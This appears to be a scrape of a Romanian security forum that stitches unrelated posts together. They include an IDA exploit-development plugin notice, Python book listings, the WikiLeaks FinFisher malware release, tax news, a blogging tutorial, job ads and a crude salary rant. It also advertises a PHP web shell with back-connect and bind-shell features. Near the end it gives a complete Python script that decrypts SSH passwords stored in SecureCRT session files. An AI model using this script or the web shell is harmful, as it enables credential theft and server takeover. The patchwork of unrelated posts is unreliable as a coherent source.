Nytro

[h=1]IDA Sploiter[/h] [TABLE] [TR] [TH]Download[/TH] [TD] idasploiter-1.0.zip [/TD] [/TR] [TR] [TH]Size[/TH] [TD] 25.4 KB [/TD] [/TR] [TR] [TH]Date[/TH] [TD]September 14th, 2014[/TD] [/TR] [TR] [TH]Version[/TH] [TD]1.0[/TD] [/TR] [/TABLE] IDA Sploiter is a plugin for Hex-Ray's IDA Pro disassembler designed to enhance IDA's capabilities as an exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others. The motivation for the development of IDA Sploiter was to make IDA Pro a comfortable, powerful and integrated environment for vulnerability research and exploit development. The plugin is designed to make many repetitive and time consuming tasks as effortless and natural as possible, so you can concentrate on other more challenging aspects of exploit development. To make the work with the plugin convenient, IDA Sploiter closely integrates with the IDA UI and exposes its functionality and various configurations through various views and forms. The plugin's logic uses IDA's powerful disassembly engine and various debugger plugins. As a result, IDA Sploiter can take advantage of many of IDA's unique features (e.g. building ROP chains remotely on a lab machine while effortlessly switching between debugger plugins). In the user guide below, you will find a comprehensive discussion of various plugin features and their sample use. Most of the sections are independent of each other, so you are welcome to jump ahead or read through the entire guide. Feel free to contact me if you have any questions, feature requests, bugs or just to say hello Table of Contents Installation Compatibility User guide Modules Filtering Modules Searching module selection [*]ROP gadgets Searching ROP gadgets Viewing ROP gadgets Syntactic and semantic gadget filters ROP chain builder Stack Pivoting Exporting [*]Writable function pointers Searching writable function pointers Viewing writable function pointers Pointer offsets Setting breakpoints Exporting [*]Memory patterns Creating a pattern Detecting a pattern [*]Comparing file to memory [*]Special Note [*]References Sursa: ida sploiter | projects | sprawl

[h=2]Text Processing in Python[/h] [h=3]David Mertz[/h] Intermediate This is an example-driven, hands on tutorial that carefully teaches programmers how to accomplish numerous text processing tasks using Python. [h=2]Probabilistic Programming and Bayesian Methods for Hackers: Using Python and PyMC[/h] [h=3]Cam Davidson-Pilon and community[/h] Intermediate aka 'Bayesian Methods for Hackers': An introduction to Bayesian methods + probabilistic programming in data analysis with a computation/understanding-first, mathematics-second point of view. All in pure Python [h=2]Explore Flask[/h] [h=3]Robert Picard.[/h] Intermediate This book is a collection of the best practices for using Flask. There are a lot of pieces to the average Flask application. [h=2]Building skills in Python[/h] [h=3]Steven F. Lot [/h] Beginner This 450+ page book has 42 chapters that will help you build Python programming skills through a series of exercises. This book includes six projects from straight-forward to sophisticated that will help solidify your Python skills. [h=2]web2py Complete Manual[/h] [h=3]Massimo Di Pierro[/h] Intermediate As you will learn in the following pages, web2py tries to lower the barrier of entry to web development by focusing on three main goals: ease of use, rapid development and security [h=2]Learning Python, 4th Edition[/h] [h=3]Mark Lutz[/h] Beginner It's an easy-to-follow self-paced tutorial, based on author and Python expert Mark Lutz's popular training course. [h=2]The Hitchhiker’s Guide to Python![/h] [h=3]Kenneth Reitz[/h] Beginner This opinionated guide exists to provide both novice and expert Python developers a best-practice handbook to the installation, configuration, and usage of Python on a daily basis. [h=2]Biopython[/h] [h=3]Various authors[/h] Intermediate This is a tutorial and cookbook for Biopython (Biopython is a set of freely available toos for biological computations. [h=2]Invent Your Own Computer Games with Python[/h] [h=3]Al Sweigart[/h] Intermediate Small and nice python game examples [h=2]Python Practice Book[/h] [h=3]Anand Chitipothu.[/h] Beginner This book is prepared from the training notes of Anand Chitipothu. Anand conducts Python trainings classes on a semi-regular basis in Bangalore, India. [h=2]Building skills in OOP[/h] [h=3]Steven F. Lot [/h] Intermediate How do you move from OO programming to OO design? This 301-page book has 49 chapters that will help you build OO design skills through the creation of a moderately complex family of application programs. [h=2]Python Cookbook, Third Edition[/h] [h=3]Various authors[/h] Intermediate This book is aimed at more experienced Python programmers who are looking to deepen their understanding of the language and modern programming idioms. [h=2]How to Tango with Django[/h] [h=3]Leif Azzopardi[/h] Beginner A beginner's guide to web development with Django 1.5.4. This book has been designed to get you going fast and to learn by example. You'll learn the key aspects of the Python Django Framework by developing an application called Rango. [h=2]Think Python[/h] [h=3]Allen B. Downey[/h] Beginner A very exhaustive book covering most of the language features, from datatypes to OOP and debugging. [h=2]Kivy programming Guide[/h] [h=3]Kivy[/h] Intermediate Discover Kivy the multitouch Python framework for desktop and mobile, and learn how to create a simple game. [h=2]Python para Desenvolvedores (2nd Edition)[/h] [h=3]Luiz Eduardo Borges[/h] Intermediate [PORTUGUESE] Este livro aborda assuntos que incluem: criação de interfaces com usuário, computação gráfica, aplicações para internet, sistemas distribuídos, entre outros. [h=2]Django Tutorial[/h] [h=3]Community[/h] Intermediate With this hands-on tutorial, discover Django the popular high-level Python Web framework that encourages rapid development and clean, pragmatic design. [h=2]Python Scientific lecture notes[/h] [h=3]by the community[/h] Intermediate Teaching material on the scientific Python ecosystem, a quick introduction to central tools and techniques. The different chapters each correspond to a 1 to 2 hours course with increasing level of expertise, from beginner to expert. [h=2]Programmez avec Python 2[/h] [h=3]Gérard Swinnen[/h] Beginner [FRENCH] Apprenez à programmer avec Python 2. Découvrez la programmation et le language Python grâce à cet ouvrage de référence. [h=2]Making games with Python and Pygame[/h] [h=3]Al Sweigart[/h] Intermediate Making Games with Python & Pygame” covers the Pygame library with the source code for 11 games. [h=2]Pyramid for Humans[/h] [h=3]Community[/h] Intermediate With this tutorial, discover Pyramid a Python web application development framework. Its primary goal is to make it easier for a Python developer to create web applications. [h=2]Problem Solving with Algorithms and Data Structures Using Python[/h] [h=3]B. Miller & D. Ranum[/h] Intermediate This book is a CS2 data structures textbook, with a review of Python concepts in chapter 1 [h=2]Flask microframework[/h] [h=3]Armin Ronacher[/h] Intermediate Learn the Flask web microframework by example. Flask aims to keep the core simple but extensible and gives you freedom to choose the libraries of your choice. [h=2]Learn Python The Hard Way[/h] [h=3]Zed A. Shaw[/h] Beginner Have you always wanted to learn how to code but never thought you could? Do you want to challenge your brain in a new way? [h=2]Python for you and me[/h] [h=3]Kushal Das[/h] Beginner A book for the total new comers into Python world. Was started as book for students before they read Python tutorial. [h=2]Programmez avec Python 3[/h] [h=3]Gérard Swinnen[/h] Beginner [FRENCH] Apprenez à programmer avec Python 3. Mise à jour du précédent ouvrage avec les spécificité de Python 3. [h=2]How to Think Like a Computer Scientist: Second Interactive Edition[/h] [h=3]B. Miller & D. Ranum[/h] Beginner This interactive book teaches you Python the interactive way, right in the browser. [h=2]Dive into Python (2004)[/h] [h=3]Mark Pilgrim[/h] Intermediate Dive Into Python is a free Python book (from 2004) for experienced programmers. It covers many basics of the language [h=2]Hacking Secret Ciphers with Python[/h] [h=3]Al Sweigart[/h] Beginner The book teaches complete beginners how to program in the Python programming language. The reader not only learns about several classical ciphers, but also how to write programs that encrypt and hack these ciphers. [h=2]Test-Driven Development with Python[/h] [h=3]Harry Percival[/h] Intermediate This book uses a concrete example—the development of a website, from scratch—to teach the TDD metholology, and how it applies to web programming, from the basics of database integration and javascript, going via browser-automation tools like Selenium, to advanced (and trendy) topics like NoSQL, websockets and Async programming. [h=2]Dive into Python 3[/h] [h=3]Mark Pilgrim[/h] Intermediate Dive Into Python 3 covers what's new in Python 3 and how its differs from Python 2. [h=2]High Performance Python tutorial[/h] [h=3]Ian Ozsvald[/h] Advanced In this 55 pages tutorial, Ian Ozsvald shows you a number of techniques to get a 10-500 performance increase in your Python apps, from profiling, to PyPy, numPy, Multiprocessing... [h=2]Python course[/h] [h=3]Patrick Fuchs / Pierre Poulain,[/h] Beginner [FRENCH] Beginner and progressive course about Python theory and concepts [h=2]Modeling Creativity[/h] [h=3]Tom De Smedt[/h] Intermediate Case studies in Python - using the libraries nodebox and pattern the author creates wonderful fractals and infographics; python code snippets included [h=2]A byte of Python[/h] [h=3]Swaroop C H[/h] Beginner This book aims to help you learn the wonderful Python language and show how to get things done quickly and painlessly - in effect 'The Perfect Anti-venom to your programming problems'. [h=2]Python 101 - Introduction to Python[/h] [h=3]Dave Kuhlman[/h] Beginner This document is a syllabus for a first course in Python programming. This course contains an introduction to the Python language, instruction in the important and commonly used features of the language, and practical excercises in the use of those features. [h=2]A bit of Python & other things.[/h] [h=3]Jesse Noller[/h] Beginner A usefull page with good links to read about Python [h=2]Snake Wrangling for Kids[/h] [h=3]Jason R. Briggs[/h] Beginner [DOWNLOAD REQUIRED] For children 8 years and older, who would like to learn computer programming. It covers the very basics of programming, and uses the Python programming language to teach the concepts. [h=2]Data Structures and Algorithms with Object-Oriented Design Patterns in Python[/h] [h=3]Bruno R. Preiss[/h] Intermediate This book is about the fundamentals of data structures and algorithms. It uses object oriented design patterns and teaches topics like stacks, queues, lists, hashing and graphs. There are also versions for other programming languages. [h=2]The Standard Python Library[/h] [h=3]Fredrik Lundh[/h] Intermediate This book provides a brief description of each module of the +200 Python standard library and usage examples [h=2]Python 3x Programming (sample)[/h] [h=3]Jody S. Ginther[/h] Beginner (4 free chapters) Python 3x Programming, Made Fun and Easier by Jody S. Ginther is for the beginning programmer who wants to learn visually and have some fun while learning programming. The full course will take the beginner from ground zero to making their own arcade style game complete with; music, sound, graphics, and how to make a distribution package to share it with your friends in 21 lessons. [h=2]Porting to Python 3: An in-depth guide[/h] [h=3]Lennart Regebro[/h] Intermediate This book guides you through the process of porting your Python 2 code to Python 3, from choosing a porting strategy to solving your distribution issues. Using plenty of code examples is takes you cross the hurdles and shows you the new Python features. [h=2]Programming Computer Vision with Python[/h] [h=3]Jan Erik Solem[/h] Advanced [PDF DRAFT] This book gives an entry point to hands-on computer vision (images, videos...) with enough understanding of the underlying theory and algorithms. [h=2]Think Complexity[/h] [h=3]Allen B. Downey[/h] Advanced This book is about complexity science, data structures and algorithms, intermediate programming in Python, and the philosophy of science. [h=2]Natural Language Processing with Python[/h] [h=3]S. Bird, E. Klein & E. Loper[/h] Advanced Practical introduction to programming for language processing, written by the creators of NLTK. [h=2]Think Stats[/h] [h=3]Allen B. Downey[/h] Advanced Think Stats is an introduction to Probability and Statistics for Python programmers. [h=2]Getting Started with Django[/h] [h=3]Kenneth Love[/h] Beginner Getting Started with Django (or GSWD) is a series of video-based lessons meant to take you from novice to competent [1], or maybe even beyond. [h=2]Building skills in Programming[/h] [h=3]Steven F. Lot [/h] Beginner How do you learn to program? Through a series of simple exercises that teach programming fundamentals with an easy-to-use, easy-to-learn programming language. [h=2]An introduction to Python[/h] [h=3]John C. Lusth[/h] Beginner A complete scholar overview of all Python 3 functionnalities from the Alabama University. [h=2]Python Module of the week[/h] [h=3]Doug Hellman[/h] Intermediate The Python Module of the Week series, or PyMOTW, is a tour of the Python standard library through short and concrete examples. It covers more than 50 modules. [h=2]Djen of Django[/h] [h=3]Agiliq[/h] Intermediate Djen of Django is a book consisting of a series of small Django projects based on small real-world examples. For instance, building a Pastebin, a Blog or a Project Management Application. Djen of Django focuses on teaching the reader Django best practices through the use of real-world examples. [h=2]Python Course[/h] [h=3]Google[/h] Beginner This is a free class for people with a little bit of programming experience who want to learn Python. [h=2]A Programmer's Guide to Data Mining[/h] [h=3]Ron Zacharski[/h] Intermediate A guide to practical data mining, collective intelligence, and building recommendation systems. [h=2]Python in Hydrology[/h] [h=3]Sat Kumar Tomer[/h] Beginner Python in Hydrology is written for learning Python using its applications in hydrology. The book covers the basic applications of hydrology, and also the advanced topic like use of copula. [h=2]Non-Programmer's Tutorial for Python 3[/h] [h=3]Josh Cogliati/Wikibooks/Others[/h] Beginner The Non-Programmers' Tutorial For Python 3 is a tutorial designed to be an introduction to the Python programming language. This guide is for someone with no programming experience. [h=2]Python para todos[/h] [h=3]Raúl González Duque[/h] Beginner [sPANISH] Libro sobre programación en Python a modo de tutorial, adecuado para todos los niveles de aprendizaje, desde novatos hasta expertos que quieren conocer más sobre Python. Sursa: PythonBooks - Learn Python the easy way !

SpyFiles 4 Release Documents Customers Database Today, 15 September 2014, WikiLeaks releases previously unseen copies of weaponised German surveillance malware used by intelligence agencies around the world to spy on journalists, political dissidents and others. FinFisher (formerly part of the UK based Gamma Group International until late 2013) is a German company that produces and sells computer intrusion systems, software exploits and remote monitoring systems that are capable of intercepting communications and data from OS X, Windows and Linux computers as well as Android, iOS, BlackBerry, Symbian and Windows Mobile devices. FinFisher first came to public attention in December 2011 when WikiLeaks published documents detailing their products and business in the first SpyFiles release. Since the first SpyFiles release, researchers published reports that identified the presence of FinFisher products in countries aroud the world and documented its use against journalists, activists and political dissidents. Julian Assange, WikiLeaks Editor in Chief said: "FinFisher continues to operate brazenly from Germany selling weaponised surveillance malware to some of the most abusive regimes in the world. The Merkel government pretends to be concerned about privacy, but its actions speak otherwise. Why does the Merkel government continue to protect FinFisher? This full data release will help the technical community build tools to protect people from FinFisher including by tracking down its command and control centers." FinFisher Relay and FinSpy Proxy are the components of the FinFisher suite responsible for collecting the data acquired from the infected victims and delivering it to their controllers. It is commonly deployed by FinFisher's customers in strategic points around the world to route the collected data through an anonymizing chain, in order to disguise the identity of its operators and the real location of the final storage, which is instead operated by the FinSpy Master. [TABLE=class: table table-bordered] [TR] [TH]File Name[/TH] [TH]Product Name[/TH] [TH]MD5[/TH] [TH]File Size[/TH] [/TR] [TR] [TD]ffrelay-debian-4.30.ggi.zip[/TD] [TD]FinFisher Relay v4.30[/TD] [TD]180caf23dd71383921e368128fb6db52[/TD] [TD]224K[/TD] [/TR] [TR] [TD]finspy_proxy.zip[/TD] [TD]FinSpy Proxy v2.10[/TD] [TD]3dfdac1304eeaaaff57cc11317768511[/TD] [TD]320K[/TD] [/TR] [TR] [TD]finspy_master.zip[/TD] [TD]FinSpy Master v2.10[/TD] [TD]03d93c49a536d149206f5524d87fa319[/TD] [TD]2.5M[/TD] [/TR] [/TABLE] WikiLeaks is also publishing previously unreleased copies of the FinFisher FinSpy PC spyware for Windows. This software is designed to be covertly installed on a Windows computer and silently intercept files and communications, such as Skype calls, emails, video and audio through the webcam and microphone (you can find more details on FinSpy in the first SpyFiles release). In order to prevent any accidental execution and infection, the following files have been renamed and compressed in password protected archives (the password is "infected"). They are weaponised malware, so handle carefully. [TABLE=class: table table-bordered] [TR] [TH]File Name[/TH] [TH]Product Name[/TH] [TH]MD5[/TH] [TH]File Size[/TH] [/TR] [TR] [TD]finfisher.1.zip[/TD] [TD]FinSpy PC[/TD] [TD]2d5c810035dc0f83036fb12e8775817a[/TD] [TD]736K[/TD] [/TR] [TR] [TD]finfisher.2.zip[/TD] [TD]FinSpy PC[/TD] [TD]434b83eba7619cb706492ff019ade0d5[/TD] [TD]576K[/TD] [/TR] [/TABLE] In order to challenge the secrecy and the lack of accountability of the surveillance industry, analyzing the internals of this software could allow security and privacy researchers to develop new fingerprints and detection techniques, identify more countries currently using the FinFisher spyware and uncover human rights abuses. In addition, in this fourth iteration of the SpyFiles collection, WikiLeaks publishes the newly indexed material the same as the recent FinFisher breach (for which you can find the torrent file here), including new brochures and a database of the customer support website, that provide updated details on their productline and a unique insight into the company's customer-base. In order to make the data more easily accessible and consumable, all the new brochures, videos and manuals are now available organized under the related FinFisher product name. The database is represented in full, from which WikiLeaks compiled a list of customers, their eventual attribution, all the associated support tickets and acquired licenses, along with the estimated costs calculated from FinFisher's price list. WikiLeaks conservatively estimates FinFisher's revenue from these sales to amount to around €50,000,000. Within the full list of customers, it's worth noticing that among the largest is Mongolia, which has been recently selected as new Chair of the Freedom Online Coalition. Together with the previous releases, the SpyFiles collection represents a unique and central resource where to find extensive and exclusive documentation about the global surveillance industry, also indexed and searchable through the =9&sort=0"]WikiLeaks Search. Sursa: https://wikileaks.org/spyfiles4/index.html

ANAF a lansat platforma online prin care persoanele pot afla date despre situa?ia lor fiscal?. Cum func?ioneaz? "Spa?iul virtual privat" ANAF a lansat luni platforma online pe site-ul propriu prin care persoanele fizice pot solicita, în urma înregistr?rii ?i autentific?rii cu username ?i parol?, informa?ii precum situa?ia obliga?iilor de plat?, nivelul CAS declarat de angajator ?i decizia de impunere, r?spunsul venind tot electronic. Platforma, denumit? "Spa?iul virtual privat", este dedicat? deocamdat? persoanelor fizice, în cadrul unui proiect pilot pentru Bucure?ti ?i Ilfov, iar datele pot fi consultate 24 din 24 de ore. "În 2015 inten?ion?m s? extindem proiectul în toat? ?ara, iar dup? ce-l extindem se vor ad?uga în Spa?iul virtual privat ?i alte informa?ii, precum decizii de impunere pentru pl??i anticipate ?i pentru alte accesorii, soma?ii ?i titluri executorii. De asemenea, tot în 2015 vrem s? extindem programul ?i c?tre persoanele juridice, care se vor putea loga cu username ?i parol?", a declarat luni, ministrul Finan?elor Publice, Maria Ioana Petrescu, la lansarea platformei, la care a participat ?i premierul Victor Ponta. Ea a ar?tat c?, în prezent, firmele î?i pot verifica situa?ia fiscal? doar dac? de?in un certificat digital de semn?tur?, care se ob?ine contra cost. Bugetul pentru acest program pilot a fost zero, potrivit ministrului, la care a lucrat o echip? mixt? a ANAF ?i MFP, îns? pentru extinderea la nivel na?ional este nevoie de o infrastructur? de servere. "Suntem în discu?ie cu Banca Mondial? pentru ca serverele pe care trebuie s? le trimit? pentru modernizarea ANAF s? vin? în timp util pentru acest program", a precizat Petrescu. Persoanele fizice pot efectua solicit?rile online, dup? ce s-au autentificat în sistem, iar r?spunsurile sunt primite tot în cadrul aplica?iei, într-o sec?iune de mesaje, cu documentele cerute ata?ate. Obliga?iile de plat? trimise de ANAF sunt valabile pentru ultima zi a lunii anterioare interog?rii, iar deciziile de impunere se pot primi dac? sunt emise dup? data punerii în func?iune a sistemului. Pentru angaja?ii care au venituri doar din contracte individuale de munc? nu se emit decizii de impunere, astfel c? pentru înregistrarea în spa?iul virtual identificarea lor trebuie f?cut? direct la ghi?eul ANAF. Totodat?, ANAF va pune la dispozi?ia contribuabilului serviciul "Buletinul informativ fiscal", inclusiv în perioada de aplicare a proiectului pilot, care va include informa?ii publice cu caracter fiscal, precum calendarul obliga?iilor fiscale, nout??i legislative, ghiduri fiscale, campanii derulate ?i comunicate de pres?. Sursa: ANAF a lansat platforma online prin care persoanele pot afla date despre situa?ia lor fiscal?. Cum func?ioneaz? "Spa?iul virtual privat" - Mediafax

How to start blogging with Microsoft Word Alex Castle Sep 15, 2014 3:30 AM Blogging with Microsoft Word lets you use the richly featured word processor to circumvent many of the underpowered, sometimes unfriendly aspects of browser-based interfaces used by platforms like WordPress or Blogger. We'll show you several ways to write and publish blog posts directly from Word, using the tools and shortcuts you already know. While the this tutorial is written for Word 2013, the necessary features are available in all versions starting from Word 2007. WordPress WordPress is a super-popular, open-source blogging platform that’s designed to be flexible, customizable and user-friendly. WordPress is also very easy to use with Microsoft Word. If you haven’t already set up a WordPress blog, you can do it in just a few minutes. Just visit WordPress.com, pick a URL that’s not taken yet, and fill in some basic personal info. WordPress will try to upsell you to the $25-per-year hosting, but if you decline you’ll still have unlimited free hosting and a “[something].wordpress.com” domain name. You’ll be asked to pick a theme for your site, connect a social media account, and write an introductory post. You can skip the latter two steps and go back to change any of this stuff at a later time. Creating a WordPress blog is easy and intuitive on WordPress.com. Setting up a WordPress blog on your own web server isn't much harder, but takes little more time. You can also download and install WordPress on almost any web host. Many hosts have scripts that handle the setup for you, but you can always visit WordPress.org to download a copy of the software. (Note that the .org website is dedicated to the WordPress software itself, while the .com website is the hosted service.) After a quick confirmation of your email address, you’re ready to begin writing your first blog post. Open up Word and click File > New. From the templates menu, choose Blog Post and click Create. Crafting blog posts in Word provides a familiar interface and set of tools. Not all of Word's functionality is available, though. Click the button at the top left of the window marked Manage Accounts. In the dialog that pops up, you can add any number of accounts and choose which one to publish to. Click New Account and choose WordPress from the dropdown menu. You’ll be asked for your blog’s URL (enter it without the “www.”), account name, and password. Once you’ve done that, just use the formatting tools in Word to write as you normally would. When you’re done, click the Publish button in the top left. Your post will be uploaded to your WordPress blog. When viewed in a browser, WordPress posts crafted in Word will look as you expect them to. Spacing and colors are subject to the the theme you choose for your Blog, however. If you’d like to upload it but not make it public yet, click on the arrow under Publish and choose Publish as Draft. You’ll be able to find the post in your WordPress posts list, and you can publish it whenever you want. Blogger Another popular blogging platform is Google’s Blogger. Google account integration is obviously one of its advantages over WordPress, but Microsoft Word’s integration with the service isn’t quite as polished. Word can’t upload images directly to Blogger, for instance—you’ll have to go into the Blogger CMS (content management system) and add them manually. To get started, go to Blogger and log in with a Google account. The default setting is to link your Blogger blog to your Google+ account, but you could also choose to log in with a limited Blogger account. You’ll still log in with your Google account, but you can pick a new user name for the Blogger profile, and the two won’t be publicly linked. Creating a new Blogger blog is very simple, especially for the Google faithful. Next, you’ll see the Blogger dashboard, which shows you a (still empty) list of blogs you own. Click the “New Blog” button. Like WordPress, you choose a domain name as well as a theme for your site. Click “Create Blog,” and you’re ready to post. Back in Word, you can post to Blogger the same way as in the WordPress section above—just click File > New > Blog post and add your Blogger account information in the account manager. Because you can’t automatically upload images to Blogger using this method, your posts will have to be text-only. Still, you can use Word’s text-formatting options, such as headers, bold and italics and text alignment, and that will carry over to your blog post intact. Using other platforms Although WordPress and Blogger are better suited to fledgling bloggers, a few other blog platforms work with Microsoft Word’s publishing capability, including TypePad, and Microsoft’s own SharePoint. Here’s the trick you can use with alternative blogging platforms. Normally, if you copy and paste text from Word into a browser-based editor, the post will be utterly, irrevocably messed up by Word's usually-invisible formatting data, which turns into gibberish when you copy it into a different editor. Copying the Word text into a plaintext editor like Notepad strips out all the formatting data. Next, copy the text from Notepad into the target editor (like a web form). This will keep your post from breaking, but it strips out all the formatting, which kind of defeats the purpose of using Word in the first place. Converting your Word document to Google Docs format will strip out the parts of the Word document that don't translate well to a copy-and-paste. You can strip out the junk data without removing the formatting by using Google Drive. Just save your draft as a .doc or .docx file, then upload that to your Google Drive. Open the file using Google’s web-based word processor, Docs. The processor will automatically convert the word file into blog-friendly HTML, and you can copy-paste the whole post from the Google editor to your blog platform of choice, keeping all your formatting. This trick won’t work for all browser editors, and you might have to make a few corrective tweaks. Still, it’s a lot easier than reformatting a long post from scratch. Sursa: How to start blogging using Microsoft Word with WordPress or Blogger

CCCP Shell CCCPShell is a PHP Shell written from scratch in my spare time. You will find in this shell Pure javascript (sessionStorage, serialize, ajax, append, remove, empty, change sort table order and dialogs modals) PHP zip with php code Full DB explorer (mysql, mssql, pgsql, oracle, sqlite, sqlite3, odbc and pdo) 21 icons for use in 94 file types CSS3 Easy to translate to another language via tText function WIP All the standard shell stuff Encrypted comunication (first phpshell in the world???) All tools Filemanager [+] Copy/paste (recursive) [+] In memory compress and download (recursive) [+] Delete (recursive) [+] Create file/folder [+] Fast view folder size/count objets [+] Fast file rename [+] Fast chmod [+] Fast change filedate [+] Create file/folder [!] View file information [+] Full Path [+] Size [+] MD5 [+] Chmod/Chown [+] Create time [+] Access time [+] Modify time[+] Hexdump preview/full [+] Highlight code [+] File Content [!] Edit [+] Change filetime [+] File Name [+] Change content Procs [+] Process viewer/info [+] Process killer SQL [+] Database explorer [+] Execute SQL code Info [+] Server info [+] PHP Info [+] Custom functions check External Connect [+] Back Connect [+] Bind Shell Execute [+] Eval PHP code [+] Execute (exec, shell_exec, system, passthru, popen and proc_open) Self remove WARNING This shell use atob an btob javascript functions. Read if your browser support it https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64.atob Images Sursa: https://github.com/xchwarze/CCCPShell Via: TrojanForge

Pentru un nou proiect ce presupune dezvoltare de aplicatii desktop pe MAC si Windows, clientul nostru isi doreste un Programator C++, cu experienta pe framework-ul Qt, care va face parte dintr-o echipa de 5 persoane. Postul este deschis atat in Bucuresti, cat si in sediul din Iasi. Cine e interesat sa imi dea PM.

Va trimit mai multe informatii in legatura cu oportunitatea de Embedded Software Developer pentru locatia Bucuresti, pentru unul din proiectele noastre care activeaza in domeniul automotive. PM cine e interesat.

Nu e asta ala de zicea ca el castiga 140 de milioane pe luna? E cumva in Amsterdam si a tras chestii dubioase?

Da-ne mai multe detalii. Ce anume faci acolo? Ce limbaje cunosti? In ce limbaj lucrezi cel mai mult? Cine ti-a dat 40 de milioane initial? Cine iti dau 140 de milioane? E vorba de Romania? Cati ani ai? Cati ani de experienta ai? Ai pile la stat? Atat primesti in mana, adica salariu net?

Super tare! Am castigat 10$ in doar 2 saptamani! BRB, imi iau DOUA pachete de tigari!

Ba. Cine pula mea credeti ca sare pe voi cu banii? MUIE! Nu ati scris in viata voastra 200 de linii de cod si va asteptati la salariu de 50 de milioane. Porstilor. La inceput nu va da nimeni mai mult de 1500-2000 indiferent de limbaj. Mai ales ca te duci acolo cu un CV pe care scrie: "Vai, stiu 42 de limbaje de programare" si atat. Proiecte la care ai lucrat? Pula. Toate sunt rentabile. In orice limbaj poti castiga pana la 2000-2500 de euro pe luna. Dar asta cand ajungi Team Leader, Manager sau ai o alta functie de conducere. Intre timp, incepi cu 1500 RON (nici pe astia nu ii meritati) si cresti treptat. Sa zicem asa: 1500 RON - cam 6 luni -1 an. Ajungi apoi pe la 20 si ceva de milioane, apoi 30 de milioane. Si dupa macar 2 ani de experienta sa aveti bunul simt sa cereti mai mult de atat. Se poate creste si mai rapid, depinde de firma la care ajungeti si cat de buni sunteti. Nu va mai luati dupa ce spun altii ca ei castiga 80 de milioane pe luna. Se castiga, dar dupa multi ani de munca. Ala a muncit poate 5 ani sa ajunga la salariul asta, voi ati dat 5 ani la laba, nu ati facut nimic si mergeti la interviuri mirandu-va ca va scot aia pe usa cand discutati de salariu. Cat despre limbajul de programare, alegerea e simpla: alege ce iti place. Intotdeauna o sa fii bun in ceea ce iti place sa faci. Asa cum esti bun la jucat jocuri de cacat, asa o sa fii bun in C++ daca iti place asta. Dar inainte de a va gandi macar sa va angajati, faceti-va CV-ul si ganditi-va ca aveti o firma si vine un pusti cu acel CV la voi si discutati de salariu. Asa o sa va dati seama cat meritati. Nota: Daca sunteti olimpici sau buni in ceva puteti castiga din start mai mult. Sa zicem ca luati din start 40 de milioane pe luna. Dar asta vine cu alte neajunsuri la pachet: 1. NU o sa vedeti o marire de salariu 2. NU aveti voie sa plecati de la firma respectiva timp de 2 ani E doar un caz, mai mult sau mai putin real. Daca o firma va ofera salariu mare, fiti siguri ca ceva nu este in regula si cititi contractul inainte de a-l semna. @2time - Care a fost primul tau salariu? @gogusan - Ti-au dat tie primul salariu atat pe Java? Aici e vorba de primul salariu. Nu mai veniti aici cu astfel de numere sa le faceti iluzii copiilor. Nota: O ruda de-a mea castiga 1500 RON pe luna ca femeie de serviciu. Programarea nu mai e ceea ce era acum cativa ani. Sunt MII de oameni ba, MII de oameni care termina o facultate de profil (daca nu ai facut Universitatea sau Politehnica in Bucuresti nu se uita nimeni la CV-ul taude Spiru Harte). Ce-i drept, majoritatea sunt niste cacati care nu invata nimic si doar se asteapta la miliarde pentru ca termina o facultate de cacat. Dar pentru angajator conteaza ca vine un cacat dintr-asta si cere cu 3 milioane pe luna mai putin. Asadar: 1. Lucrati la proiecte. Lasati laba, serialele si jocurile. Munciti! Construiti-va un CV, sa aveti ce arata aluia cand ziceti ca vreti o gramada de bani de la el. 2. Faceti o facultate buna. Nu Spiru Haretu pulii sau altceva. Conteaza mai mult decat credeti. 3. Invatati! La facultate sau acasa, invatati pentru ca la interviu se pun intrebari tehnice, interviuri care dureaza chiar si 3-4 ore. Nu va mai luati dupa toti prostii care posteaza aici, care au 15 ani si traiesc pe banii parintilor.

Decrypt SSHv2 passwords stored in VanDyke SecureCRT #!/usr/bin/env python# # Decrypt SSHv2 passwords stored in VanDyke SecureCRT session files # Can be found on Windows in: # %APPDATA%\VanDyke\Config\Sessions\sessionname.ini # Tested with version 7.2.6 (build 606) for Windows # Eloi Vanderbeken - Synacktiv from Crypto.Cipher import Blowfish import argparse import re def decrypt(password) : c1 = Blowfish.new('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8) c2 = Blowfish.new('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8) padded = c1.decrypt(c2.decrypt(password.decode('hex'))[4:-4]) p = '' while padded[:2] != '\x00\x00' : p += padded[:2] padded = padded[2:] return p.decode('UTF-16') REGEX_HOSTNAME = re.compile(ur'S:"Hostname"=([^\r\n]*)') REGEX_PASWORD = re.compile(ur'S:"Password"=u([0-9a-f]+)') REGEX_PORT = re.compile(ur'D:"\[sSH2\] Port"=([0-9a-f]{8})') REGEX_USERNAME = re.compile(ur'S:"Username"=([^\r\n]*)') def hostname(x) : m = REGEX_HOSTNAME.search(x) if m : return m.group(1) return '???' def password(x) : m = REGEX_PASWORD.search(x) if m : return decrypt(m.group(1)) return '???' def port(x) : m = REGEX_PORT.search(x) if m : return '-p %d '%(int(m.group(1), 16)) return '' def username(x) : m = REGEX_USERNAME.search(x) if m : return m.group(1) + '@' return '' parser = argparse.ArgumentParser(description='Tool to decrypt SSHv2 passwords in VanDyke Secure CRT session files') parser.add_argument('files', type=argparse.FileType('r'), nargs='+', help='session file(s)') args = parser.parse_args() for f in args.files : c = f.read().replace('\x00', '') print f.name print "ssh %s%s%s # %s"%(port©, username©, hostname©, password©)

Foloseste-l dintr-o masina virtuala. Si ESTE un keylogger.

